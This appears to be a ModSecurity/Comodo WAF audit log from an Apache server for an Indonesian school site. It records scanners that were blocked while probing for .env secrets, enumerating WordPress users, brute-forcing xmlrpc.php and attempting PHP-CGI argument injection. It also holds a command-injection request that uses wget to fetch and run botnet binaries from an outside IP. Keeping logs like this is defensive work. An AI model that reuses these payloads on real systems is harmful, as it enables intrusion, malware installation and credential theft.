Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63d7c770-Z-- --4e118468-A-- [10/Jun/2025:10:51:34 +0700] aEerxmkffiosQXBbxVZTtwAAANQ 103.236.140.4 39368 103.236.140.4 8181 --4e118468-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.180.42.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.180.42.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e118468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e118468-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749527494814739 2800 (- - -) Stopwatch2: 1749527494814739 2800; combined=1188, p1=392, p2=769, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e118468-Z-- --9f0ffa62-A-- [10/Jun/2025:11:28:40 +0700] aEe0eJSz29O8wd7wtMvKAQAAAIE 103.236.140.4 40036 103.236.140.4 8181 --9f0ffa62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.188.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.188.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f0ffa62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f0ffa62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749529720358499 2925 (- - -) Stopwatch2: 1749529720358499 2925; combined=1306, p1=427, p2=849, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0ffa62-Z-- --f12ceb41-A-- [10/Jun/2025:11:29:39 +0700] aEe0s5Sz29O8wd7wtMvKBgAAAJA 103.236.140.4 40054 103.236.140.4 8181 --f12ceb41-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --f12ceb41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12ceb41-E-- --f12ceb41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749529779304582 2619 (- - -) Stopwatch2: 1749529779304582 2619; combined=844, p1=496, p2=313, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12ceb41-Z-- --09cca70c-A-- [10/Jun/2025:11:58:47 +0700] aEe7h2QJEkWdvAT5oU6hmAAAABY 103.236.140.4 40346 103.236.140.4 8181 --09cca70c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.21.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.21.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --09cca70c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09cca70c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749531527730046 3292 (- - -) Stopwatch2: 1749531527730046 3292; combined=1436, p1=505, p2=900, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09cca70c-Z-- --4971d03e-A-- [10/Jun/2025:12:22:19 +0700] aEfBCzQZgo88hy0TiYz8awAAAEc 103.236.140.4 45070 103.236.140.4 8181 --4971d03e-B-- GET /protected/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --4971d03e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4971d03e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749532939322263 922 (- - -) Stopwatch2: 1749532939322263 922; combined=370, p1=318, p2=0, p3=0, p4=0, p5=52, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4971d03e-Z-- --18a2a005-A-- [10/Jun/2025:12:27:40 +0700] aEfCTGkffiosQXBbxVZWnwAAANE 103.236.140.4 45152 103.236.140.4 8181 --18a2a005-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --18a2a005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a2a005-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749533260939875 770 (- - -) Stopwatch2: 1749533260939875 770; combined=305, p1=274, p2=0, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a2a005-Z-- --092f6669-A-- [10/Jun/2025:12:59:16 +0700] aEfJtDQZgo88hy0TiYwBLwAAAE4 103.236.140.4 33954 103.236.140.4 8181 --092f6669-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: http Connection: close Content-Length: 187 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --092f6669-C-- wp.getUsersBlogsadmin12345 --092f6669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --092f6669-E-- --092f6669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 74.94.91.129 (+1 hits since last alert)|103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535156475826 4284 (- - -) Stopwatch2: 1749535156475826 4284; combined=3341, p1=360, p2=2772, p3=0, p4=0, p5=124, sr=75, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --092f6669-Z-- --29a8ba5f-A-- [10/Jun/2025:12:59:23 +0700] aEfJu2QJEkWdvAT5oU6n5AAAAAk 103.236.140.4 34000 103.236.140.4 8181 --29a8ba5f-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: http Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --29a8ba5f-C-- wp.getUsersBlogsadmin!@#$%^&* --29a8ba5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29a8ba5f-E-- --29a8ba5f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535163236592 5058 (- - -) Stopwatch2: 1749535163236592 5058; combined=3696, p1=426, p2=3051, p3=0, p4=0, p5=151, sr=73, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29a8ba5f-Z-- --a78b2551-A-- [10/Jun/2025:12:59:32 +0700] aEfJxGQJEkWdvAT5oU6n9QAAABU 103.236.140.4 34064 103.236.140.4 8181 --a78b2551-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: https Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --a78b2551-C-- wp.getUsersBlogsadmin!@#$%^&* --a78b2551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a78b2551-E-- --a78b2551-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535172887655 4203 (- - -) Stopwatch2: 1749535172887655 4203; combined=3326, p1=342, p2=2821, p3=0, p4=0, p5=96, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78b2551-Z-- --a658b738-A-- [10/Jun/2025:13:00:16 +0700] aEfJ8JSz29O8wd7wtMvQrwAAAJI 103.236.140.4 34292 103.236.140.4 8181 --a658b738-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: https Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --a658b738-C-- wp.getUsersBlogsadminBlahblah --a658b738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a658b738-E-- --a658b738-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 74.94.91.129 (166+1 hits since last alert)|103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535216588191 6086 (- - -) Stopwatch2: 1749535216588191 6086; combined=4206, p1=505, p2=3521, p3=0, p4=0, p5=108, sr=95, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a658b738-Z-- --385ad568-A-- [10/Jun/2025:13:03:05 +0700] aEfKmWkffiosQXBbxVZakAAAAMw 103.236.140.4 34394 103.236.140.4 8181 --385ad568-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --385ad568-C-- --385ad568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --385ad568-E-- --385ad568-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535385358365 3775 (- - -) Stopwatch2: 1749535385358365 3775; combined=2042, p1=457, p2=1543, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --385ad568-Z-- --40840d34-A-- [10/Jun/2025:13:28:35 +0700] aEfQkzQZgo88hy0TiYwBzQAAAFU 103.236.140.4 36542 103.236.140.4 8181 --40840d34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.66.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.66.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40840d34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40840d34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749536915280076 2086 (- - -) Stopwatch2: 1749536915280076 2086; combined=1060, p1=352, p2=682, p3=0, p4=0, p5=26, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40840d34-Z-- --7a0a5d00-A-- [10/Jun/2025:13:29:56 +0700] aEfQ5GkffiosQXBbxVZcOQAAANM 103.236.140.4 36720 103.236.140.4 8181 --7a0a5d00-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.79.243.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.79.243.123 X-Forwarded-Proto: http Connection: close --7a0a5d00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0a5d00-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749536996933987 3242 (- - -) Stopwatch2: 1749536996933987 3242; combined=1283, p1=497, p2=754, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0a5d00-Z-- --c028be73-A-- [10/Jun/2025:13:43:50 +0700] aEfUJpSz29O8wd7wtMvR8wAAAJM 103.236.140.4 36852 103.236.140.4 8181 --c028be73-B-- GET /cgi-bin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c028be73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c028be73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749537830109900 850 (- - -) Stopwatch2: 1749537830109900 850; combined=363, p1=321, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c028be73-Z-- --d1d63c1d-A-- [10/Jun/2025:15:18:41 +0700] aEfqYZSz29O8wd7wtMvdvAAAAJI 103.236.140.4 54188 103.236.140.4 8181 --d1d63c1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.253.123.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.253.123.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1d63c1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1d63c1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749543521048654 3096 (- - -) Stopwatch2: 1749543521048654 3096; combined=1344, p1=451, p2=858, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1d63c1d-Z-- --e3a72e69-A-- [10/Jun/2025:16:01:56 +0700] aEf0hJSz29O8wd7wtMvd4QAAAJg 103.236.140.4 54726 103.236.140.4 8181 --e3a72e69-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --e3a72e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3a72e69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749546116907742 880 (- - -) Stopwatch2: 1749546116907742 880; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 